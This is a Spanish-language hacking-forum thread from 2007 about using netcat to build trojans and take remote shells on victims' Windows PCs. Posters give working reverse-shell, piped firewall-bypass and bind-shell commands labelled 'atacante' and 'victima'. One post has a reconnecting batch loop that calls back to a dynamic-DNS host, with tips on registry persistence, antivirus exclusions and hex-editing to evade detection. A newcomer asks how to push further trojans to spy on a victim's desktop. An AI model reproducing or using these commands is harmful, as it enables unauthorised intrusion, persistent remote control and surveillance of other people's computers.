Jugando con netcat

Iniciado por WHK, 25 Marzo 2007, 03:17 AM

0 Miembros y 3 Visitantes están viendo este tema.

WHK

#100
Modificaré el server-nc para ponerle un nombre propio al proceso ya que lo hice como %random% para que pudieses tener mas de una shell directa o remota sin causar conflictos con otras configuraciones anteriores.
Cuando se crea el servidor este deja una shell remota el cual puedes cerrarloel proceso del netcat. El archivo se ejecuta en %TMP% porque es el único lugar donde tienes 100% sobreescritura sin importar el usuario en que estes (Restringida).

Me pondré a trabajar con lo del bot IRC Aunque no creo que algunos se pongan muy contentos porque mis bots son algo macabro jajajajaja es broma... lo haré.

nica

para los que tenian problemas con ".... no es una aplicacion win32 valida..." pues les cuento que a mi se me resolvio el problema primero haciendo el proceso en winrar, incluso hasta se pueden saltar el paso del reshacker por que el mismo winrar te agrega el incono al ejecutable, pero si lo kieren pasar por el reshack pues no hay problem por que tambien lo hice asi y no hubo problema, solo recuerden que primero la parte del rar y despues la parte del reshack.

por cierto tengo una duda, como puedo hacer para que no se me cierre la conexion y que esta siempre este activa????

WHK

antorchahumana25 :
Puedes bajarlo de http://512.iespana.es/nc

Nica:
Puedes hacer que el netcat escuche a un bat en ves del cmd.exe donde el bat diga:

@echo off
:1
nc -d -e cmd.exe ip puerto
goto 1


De esta forma cuando se te desconecte el netcat solito volverá a conectarse denuevo y también puedes añadir una entrada de registro con el comando reg add para que inicie automaticamente en cada reinicio de esa pc (recuerda que para eso Debes tener una ip fija donde te llegue la shell o puedes tener una cuenta No-Ip y poner tu DNS (nombre de dominio) en ves de la ip)
EJ:

@echo off
:1
nc -d -e cmd.exe bogamory.sytes.net 80
goto 1


Ahora estoy terminando otras cosas pero cuando termine buelvo para terminar lo del bot IRC con netcat y esto mismo de reconecciones automaticas pero con imagenes.

WHK

Hoy en dia el netcat es detectado como archivo potencialmente malicioso pero puedes agregarlo a la lista de archivos omitidos para que no te lo borre. Para mayor comodidad te recomiendo ponerlo en tu system32 y poder manejar las conexiones ejecutando directamente nc desde tu linea de comandos (CMD).

WHK

claro.. repetiré las cosas mil y una ves hasta que todos hayan aprendido por muy poco que sepan.

alt 126 ~
alt 124 |
alt 60 <
alt 62 >

netcat pipeado haciendo reverse shell

------------------------------------------------------
atacante:
nc -vv -L -p 80
nc -vv -L -p 25
------------------------------------------------------
victima:
nc xxx.xxx.xxx.xxx 80 | cmd.exe | nc xxx.xxx.xxx.xxx 25 -d
------------------------------------------------------
se enviaran comandos por puerto 80
y se resiviran por puerto 25
de esa manera se pasa al fw de windows SP2
------------------------------------------------------

netcat en reverse shell

------------------------------------------------------
atacante:
nc -vv -L -p 25
------------------------------------------------------
victima:
nc -d -e cmd.exe xxx.xxx.xxx.xxx 25
------------------------------------------------------
Se enviara una reverse shell por el puerto 25
------------------------------------------------------

netcat shell directa

------------------------------------------------------
victima:
nc -L -d -e cmd.exe -p 25
------------------------------------------------------
atacante:
nc xxx.xxx.xxx.xxx 25 -vv
------------------------------------------------------
La victima deja netcat a la escucha por el puerto 25
para que posteriormente el atacante se conecte
------------------------------------------------------

WHK

Definición de una shell acá:
http://es.wikipedia.org/wiki/Int%C3%A9rprete_de_comandos

Uso de una shell acá:
http://www.ignside.net/man/dos/batch.php
http://www.sitiosargentina.com.ar/webmaster/cursos%20y%20tutoriales/COMANDOS_DEL_DOS.htm
http://foro.elhacker.net/index.php/board,64.0.html


Como tomar una shell acá:
http://foro.elhacker.net/index.php/topic,58032.0.html

Jugar con la shell acá:
http://foro.elhacker.net/index.php/topic,159799.0.html

Talves sea necesario crear un nuevo post sobre el manejo de una shelll desde lo mas básico hasta lo más complejo... pero eso será despues por falta de tiempo.

nica

#106
jejejeje me toy acordando con tanta preguntadera que ta respondiendo el whk, cuando estaba iniciando yo.... aun no kreo que ni llegue a newbie pero voy haciendo el intento, el caso esta en que estoy niños se estan metiendo a esto y no leen, no crean que las cosas siempre las tendran en sus manos, hay que leer y cuando aparezca una duda pues haganla pero no sin antes investigar un poco..


por cierto hoy en dia el netcat es detectado por la mayoria de los av, el caso esta, en que si alguien ha probado trantando de joder los offset con algun editor hexad. y aun asi si ha funcionado el nc???

__d_mode__

@WHK your programmes looks awsome,but i cant speak spanish, sometimes i using google translate for read ur letters but i cant use ur programs, plz add to the program english language pack, regards from turkey...


WHK

there is no problem, I will as far as possible try to create greater content in English so that all can learn since my aim is that all can have right to the knowledge comes from where comes. ;) You do not worry, I will do it.

Asingato

Hola. Todos. Yo soy bien nuevo en esto. Como podran ver es mi primer mensage. E leido mucho, pero aun me quedan mcuhas dudas, porque la unica manera de lograr esto es practicando. Asi que Voy a preguntar asi pase de boba mi pregunta.

He leido todo esto y aqui me surgio mi primera duda despues de ir haciendo todo paso a paso como indica WHK. ¿De donde sale esta ventana negra? Es algun otro programa? o sencillamente es el DOS de mi computador?

"Ahora vamos a crear el programa que nos conectará con la victima, y se llama "Cliente"
Solo ejecutamos esto y estaremos listos para recibir la conexión de quien abra la carnada:

"


Asiq ue la pregunta es donde abro esta ventana? Y esto es parte de la programacion o debo abrirla cuando ya haya enviado el troyano?

Despues de esto me gustaria saber teniendo ya la shell creda. ¿ Como le subo archivos al otro pc? Debo escojer la carpeta donde se guarden? Es decir si ya le voy a enviar otro troyano para poder ver el escritorio de mi victima como lo hago y desde que programa?

Muchas gracias, espero que me pueda solucionar mis dudas. Si cometi el erro de rpetir una pregunta, disculpenme y remitanme a la respuesta, pero es que de verdad no encontre la pregunta hecha. Muchas gracias y disculpenme la primiparada.